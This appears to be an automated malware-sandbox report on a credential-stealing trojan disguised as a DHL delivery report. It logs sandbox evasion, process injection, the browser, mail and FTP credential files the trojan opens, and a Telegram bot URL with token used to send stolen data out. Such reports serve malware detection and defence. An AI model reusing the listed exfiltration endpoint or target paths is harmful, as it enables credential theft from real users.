                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6252Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6532Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508Thread sleep count: 4344 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508Thread sleep count: 4125 > 30
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                    Source: vbc.exe, 00000002.00000002.636927086.0000000004E6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A102DB0 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 612000
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 646000
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 648000
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5CE008
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts
                    211
                    Windows Management Instrumentation
                    1
                    Valid Accounts
                    1
                    Valid Accounts
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    114
                    System Information Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Query Registry
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)311
                    Process Injection
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    111
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    Scheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets131
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Valid Accounts
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                    Virtualization/Sandbox Evasion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)311
                    Process Injection
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Dhl recent package delivery report needs attention.exe37%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Dhl recent package delivery report needs attention.exe100%Joe Sandbox ML
                    No Antivirus matches
                    SourceDetectionScannerLabelLinkDownload
                    1.2.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1235971Download File
                    2.0.vbc.exe.610000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.4.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.3.unpack100%AviraHEUR/AGEN.1203035Download File
                    1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1235971Download File
                    2.0.vbc.exe.610000.1.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.2.vbc.exe.610000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.2.unpack100%AviraHEUR/AGEN.1203035Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.smartassembly.com/webservices/Reporting/UploadReport2v0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://hEsAGj.com0%Avira URL Cloudsafe
                    https://dafa.fa0%Avira URL Cloudsafe
                    https://api.telegram.org4Hkp0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/Reporting/L0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/Reporting/UploadReport20%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    https://uyuDgc6hArJiFp.org0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/UploadReportLogin/0%URL Reputationsafe
                    http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.smartassembly.com/webservices/Reporting/UploadReport2vDhl recent package delivery report needs attention.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://hEsAGj.comvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://dafa.faDhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org4Hkpvbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.orgvbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.smartassembly.com/webservices/Reporting/LDhl recent package delivery report needs attention.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.smartassembly.com/webservices/Reporting/UploadReport2Dhl recent package delivery report needs attention.exefalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://DynDns.comDynDNSnamejidpasswordPsi/Psivbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_meDhl recent package delivery report needs attention.exefalse
                                high
                                https://uyuDgc6hArJiFp.orgvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://api.telegram.orgvbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.smartassembly.com/webservices/UploadReportLogin/Dhl recent package delivery report needs attention.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURLDhl recent package delivery report needs attention.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:626595
                                    Start date and time: 14/05/202215:09:372022-05-14 15:09:37 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Dhl recent package delivery report needs attention.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 1.1% (good quality ratio 0.6%)
                                    • Quality average: 43.4%
                                    • Quality standard deviation: 40.4%
                                    HCA Information:
                                    • Successful, ratio: 82%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    15:10:53API Interceptor1x Sleep call for process: Dhl recent package delivery report needs attention.exe modified
                                    15:11:00API Interceptor749x Sleep call for process: vbc.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):805
                                    Entropy (8bit):5.360596073797118
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhk:MIHK5HKXE1qHmAHKzvRYHKhQnok
                                    MD5:366792B833C0D8969A74B40FBB71B7D8
                                    SHA1:404610028972C443AD98E00455F03037D022DCA9
                                    SHA-256:653326591133197ACF3B973C5EF35C4373D7BC8ED9D143E02DDC26C48CD65723
                                    SHA-512:8DBBBF083738332F7DE278C6CEF1010F3FBFA5509B18EDD0B6A1D1950EC3DF5FE9B0298ED1AE09A08500CEF0264F9028880CC38B8C9DA81EAD0314B7FBFD6F02
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
